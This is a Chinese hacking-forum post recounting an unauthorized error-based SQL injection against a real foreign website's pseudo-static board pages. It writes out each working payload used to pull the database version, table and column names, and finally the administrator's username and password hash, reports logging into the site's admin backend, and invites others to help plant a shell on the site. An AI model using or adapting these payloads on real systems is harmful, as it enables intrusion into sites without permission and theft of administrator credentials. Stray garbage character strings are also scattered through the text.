找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2346|回复: 0
打印 上一主题 下一主题

对国外站的伪静态注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 09:00:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。9 O9 P) q/ P1 L  }2 q8 j7 W

首先找到网站后台,加了个admin,后台出来了


' z( g; `' L) K8 f8 J3 \- S3 m
5 ^! K8 i# M* `& K
9 X5 {$ m: M8 c# C

然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入& L9 d+ h9 o9 v! l2 |
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg

从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。

首先查下数据库相关信息。

www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
" e% _5 A6 L/ ]: b6 b" o' O* u" f/ S0 j6 V0 l- S" c
- l% Y! @3 G, V/ ]: S

) i# ?' r, O: G( K4 y5 g! _6 I; ^/ b% w
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg) h' Y2 }/ t: |1 ]- N' A# J; K4 P
0 R8 z) D5 P. R9 H+ t: {1 O
2 Y; Z# h+ B% M, T5 \
3 M9 G- n  q7 I+ r/ G
) h% {* v0 f9 \
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。

然后我们查表

http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))--

得到管理员表段frame_administrator
! L7 [% N. L& c, I& v
# [+ f% B$ q  Z6 S
0 Z/ C9 {0 }' ]9 `: `* `http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg' }/ G. |1 O7 E
8 C$ W) s9 b: I& ^2 u
/ M& N; w$ G5 _: X' C) n9 a$ S& \

查字段

http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--' |- O& G* S/ S/ C, |; X& C
7 s; p' d" \( N8 F* f
2 T2 B) q* z5 j/ Z

$ U% F! G; O$ G6 e' d  R( \) s

得到userID,userPass字段

最后

http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--4 ?' |6 W/ s" j. V7 o% p7 {( q
2 i, E6 `% w5 S7 n2 w! D, i
8 k3 X9 i  U6 Y

5 Q$ h* A' ?8 m' b) k% K# b. D

得到最终结果admin eb0a191797624dd3a48fa681d3061212

解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表